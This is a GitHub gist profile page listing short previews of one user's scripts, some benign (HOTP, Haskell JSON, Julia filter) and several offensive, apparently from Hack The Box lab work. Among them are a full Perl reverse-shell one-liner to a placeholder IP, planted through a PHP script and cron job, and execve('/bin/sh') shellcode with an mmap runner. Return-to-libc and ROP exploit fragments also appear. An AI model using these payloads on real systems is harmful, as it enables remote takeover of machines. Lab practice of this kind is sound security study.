Skip to content

Instantly share code, notes, and snippets.

Avatar

Saf safiire

View GitHub Profile
@safiire
safiire / hotp.rb
Last active Apr 1, 2019
A script to calculate an HOTP code
View hotp.rb
#!/usr/bin/env ruby
require 'base32'
require 'openssl'
# Script to calculate HOTP so I don't have to use my phone
class HOTP
def initialize(original_secret, counter = 0)
secret = Base32.decode(original_secret)
@safiire
safiire / netstat.rb
Created Feb 25, 2019
Grab Netstat from "hackback" box on HTB
View netstat.rb
#!/usr/bin/env ruby
require 'uri'
require 'net/http'
require 'json'
Url = 'http://hackback:6666/netstat'
puts "Grabbing #{Url}"
uri = URI.parse(Url)
@safiire
safiire / exploit.sh
Created Jan 9, 2019
Buffer overflow from a small amount of space, with some ROP and env shellcode
View exploit.sh
#!/bin/bash
# ASLR is on (stack, libs, vdso, etc)
# execstack is on
# .text segment is static, no pie
#
# #include <string.h>
#
# int dobug(char *arg) {
# char buf[8];
# strcpy(buf, arg);
@safiire
safiire / cron_executed_reverse_tcp.php
Created Sep 26, 2018
So your shell won't inherit php's file descriptor situation.
View cron_executed_reverse_tcp.php
<?php
$perl = 'use Socket;$i="xx.xx.xx.xx";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};';
$fp = fopen('/tmp/shell.pl', 'w');
fwrite($fp, "#!/usr/bin/perl\n");
fwrite($fp, $perl);
fclose($fp);
system('chmod 777 /tmp/shell.pl');
$hour = date('H');
$minute = date('i') + 1; // disgusting
$fp = fopen('/tmp/add_cron.sh', 'w');
@safiire
safiire / october_aslr_setuid.rb
Last active Nov 8, 2018
Return2LibC for a HTB setuid binary
View october_aslr_setuid.rb
#!/usr/bin/env ruby
# This is what we need to guess from ldd vuln
ldd_load_address = 0xb75ba000
# Next get offset of system() and its address
system_offset = 0x1e310
system_address = ldd_load_address + system_offset
# Next get offset of /bin/sh from strings -d -tx libc.6.so, minus correction
@safiire
safiire / mmap.c
Last active Aug 28, 2017
Copy Shellcode into a Write Exec mmap()'d area, and jump to it.
View mmap.c
#include <string.h>
#include <sys/mman.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
// NOP padded execve("/bin/sh")
char *sc =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
@safiire
safiire / fork_aslr.c
Last active Aug 25, 2017
How many bits are random on Linux ASLR?
View fork_aslr.c
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>
/*
* A fork() doesn't (and shouldn't) re-randomize the address space
* but that happens properly after the exec()
@safiire
safiire / parse_json.hs
Created Jan 17, 2017
Parsing JSON in Haskell
View parse_json.hs
{-# LANGUAGE OverloadedStrings, DeriveGeneric #-}
import Data.Text (Text)
import Data.Aeson
import GHC.Generics
import qualified Data.ByteString.Lazy as B
data Person =
Person { first :: !Text
, last :: !Text
@safiire
safiire / rc_filter_simulation.jl
Last active Jul 19, 2017
Same old RC Filter Simulation in Julia
View rc_filter_simulation.jl
abstract PassiveComponent
type Resistor <: PassiveComponent
value::Complex{Float64}
end
type Capacitor <: PassiveComponent
value::Complex{Float64}
end
@safiire
safiire / kleisli.rb
Created Dec 16, 2016
Kleisli Gem is pretty awesome
View kleisli.rb
require 'kleisli'
def do_lots(count)
(0..count).reduce(0){|sum, value| sum + value }
end
future = Future(100000000) >-> value {
Future {
do_lots(value.call)
} >-> big_sum {
You can’t perform that action at this time.